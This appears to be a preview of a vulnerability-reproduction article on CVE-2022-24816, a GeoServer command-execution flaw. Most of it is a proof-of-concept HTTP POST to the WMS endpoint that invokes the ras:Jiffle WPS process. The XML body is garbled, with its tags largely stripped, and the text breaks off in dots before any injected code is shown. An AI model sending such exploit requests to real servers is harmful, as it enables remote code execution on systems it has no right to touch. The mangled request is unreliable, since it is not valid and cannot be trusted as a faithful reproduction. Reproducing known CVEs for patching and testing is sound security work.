Article preview
Vulnerability reproduction: CVE-2022-24816, GeoServer command execution vulnerability

Visit: http://127.0.0.1/geoserver/ows

PoC:

POST /geoserver/wms HTTP/1.1
Host: xxxxxxxxx
Content-Type: application/xml
Accept-Encoding: gzip, deflate

"1.0" encoding= "UTF-8" ?>
"1.0.0" service= "WPS"
  xmlns:xsi= "http://www.w3.org/2001/XMLSchema-instance"
  xmlns= "http://www.opengis.net/wps/1.0.0"
  xmlns:wfs= "http://www.opengis.net/wfs"
  xmlns:wps= "http://www.opengis.net/wps/1.0.0"
  xmlns:ows= "http://www.opengis.net/ows/1.1"
  xmlns:gml= "http://www.opengis.net/gml"
  xmlns:ogc= "http://www.opengis.net/ogc"
  xmlns:wcs= "http://www.opengis.net/wcs/1.1.1"
  xmlns:xlink= "http://www.w3.org/1999/xlink"
  xsi:schemaLocation= "http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd" >
ras:Jiffle
"image/tiff">
result
………………………………